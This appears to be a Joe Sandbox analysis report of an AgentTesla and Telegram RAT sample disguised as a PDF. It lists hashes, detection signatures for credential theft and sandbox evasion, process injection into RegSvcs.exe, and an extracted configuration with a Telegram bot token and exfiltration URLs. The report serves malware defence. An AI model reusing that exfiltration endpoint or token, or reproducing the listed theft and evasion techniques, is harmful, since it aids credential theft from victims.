Loading ...

Play interactive tourEdit tour

Windows Analysis Report 20220114080343434.pdf.exe

Overview

General Information

Sample Name:20220114080343434.pdf.exe
Analysis ID:553218
MD5:cd9290d22bb18ced32a1b81814888382
SHA1:83b1ce896dca71d611232fe4197cbe3993cccf64
SHA256:3876b600bafaaaf0a580e3925b9851c1c82ea16b40fb6b2b127296a523cf86fd
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Tries to steal Mail credentials (via file / registry access)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Uses an obfuscated file name to hide its real file extension (double extension)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 20220114080343434.pdf.exe (PID: 4616 cmdline: "C:\Users\user\Desktop\20220114080343434.pdf.exe" MD5: CD9290D22BB18CED32A1B81814888382)
    • RegSvcs.exe (PID: 6500 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
    • RegSvcs.exe (PID: 1496 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "2124798776", "Chat URL": "https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000008.00000002.553231861.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000008.00000002.553231861.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Click to see the 21 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.20220114080343434.pdf.exe.3edcc90.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.20220114080343434.pdf.exe.3edcc90.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.20220114080343434.pdf.exe.3e74280.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.20220114080343434.pdf.exe.3e74280.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    8.0.RegSvcs.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 17 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
                      Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\Desktop\20220114080343434.pdf.exe" , ParentImage: C:\Users\user\Desktop\20220114080343434.pdf.exe, ParentProcessId: 4616, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6500
                      Sigma detected: Possible Applocker BypassShow sources
                      Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\Desktop\20220114080343434.pdf.exe" , ParentImage: C:\Users\user\Desktop\20220114080343434.pdf.exe, ParentProcessId: 4616, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6500

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0.2.20220114080343434.pdf.exe.3edcc90.4.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "2124798776", "Chat URL": "https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument"}
                      Source: RegSvcs.exe.1496.8.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendMessage"}
                      Machine Learning detection for sampleShow sources
                      Source: 20220114080343434.pdf.exeJoe Sandbox ML: detected
                      Source: 8.0.RegSvcs.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.0.RegSvcs.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.0.RegSvcs.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.0.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 8.0.RegSvcs.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 20220114080343434.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49830 version: TLS 1.2
                      Source: 20220114080343434.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: WellKnownSidTy.pdb source: 20220114080343434.pdf.exe

                      Networking:

                      barindex
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: POST /bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9d77ee3312256Host: api.telegram.orgContent-Length: 1009Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: http://UeFrqT.com
                      Source: RegSvcs.exe, 00000008.00000002.557264398.0000000003712000.00000004.00000001.sdmpString found in binary or memory: http://api.telegram.org
                      Source: RegSvcs.exe, 00000008.00000002.558576320.00000000065C8000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: RegSvcs.exe, 00000008.00000002.558576320.00000000065C8000.00000004.00000001.sdmpString found in binary or memory: http://crl.veris
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283152648.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283208748.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283182173.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283259509.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283123679.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283244194.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://en.w
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283914641.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283885811.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283942441.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283961213.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.283914641.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com(
                      Source: RegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286760496.0000000005D03000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286824795.0000000005D04000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286816564.0000000005D03000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286767765.0000000005D04000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286924962.0000000005D03000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286942039.0000000005D04000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.289190210.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289318058.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289093184.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289252588.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289143103.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288858385.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288918153.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288983388.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.289034401.0000000005CF3000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.286900771.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com9
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.286900771.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comesS
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comn-u/
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.286962308.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.287143704.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.287041681.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comue
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.286900771.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comuy
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.290845442.0000000005CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.290817792.0000000005CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.291923026.0000000005CEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.290817792.0000000005CF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/d
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.291515061.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291556929.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291697526.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291435256.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291598283.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291358079.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291398360.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291473881.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291757927.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291647210.0000000005CEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html.$
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.291358079.0000000005CEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmld
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291435256.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291398360.0000000005CEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.291078110.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290998503.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.291023701.0000000005CEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersR
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.292082396.0000000005CEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersr
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.311680143.0000000001397000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comB.TTF
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.311680143.0000000001397000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.coma
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283710366.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283548411.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283352927.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comiv
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.285870318.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.c
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.286054163.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285976448.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.285705421.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285739553.0000000005CF8000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285783264.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn9
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.286148512.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286315824.0000000005CFA000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286054163.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285976448.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285870318.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286200312.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnP
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.285705421.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285739553.0000000005CF8000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285783264.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnTC
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.295330398.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295411677.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/denHp
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.294959412.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295250238.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295114414.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295200642.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmNp
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.294959412.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.295114414.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmSw
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285325370.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.micro.
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283710366.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283152648.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283067842.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282926493.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282987555.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283208748.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283548411.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283182173.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282954072.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283259509.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283123679.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283244194.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283352927.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283094856.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283849906.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283794895.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283036793.0000000005CF3000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.283290825.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283305003.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283152648.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283067842.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283208748.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283548411.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283182173.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283259509.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283123679.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283244194.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283352927.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283094856.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.283036793.0000000005CF3000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comW
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.282987555.0000000005CF3000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.282987555.0000000005CF3000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.282954072.0000000005CF3000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coms
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.288918153.0000000005CF3000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285266662.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.285325370.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285266662.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kra-e
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.285400973.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285455774.0000000005CF8000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krr-t
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.285325370.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.285266662.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kru-hX
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
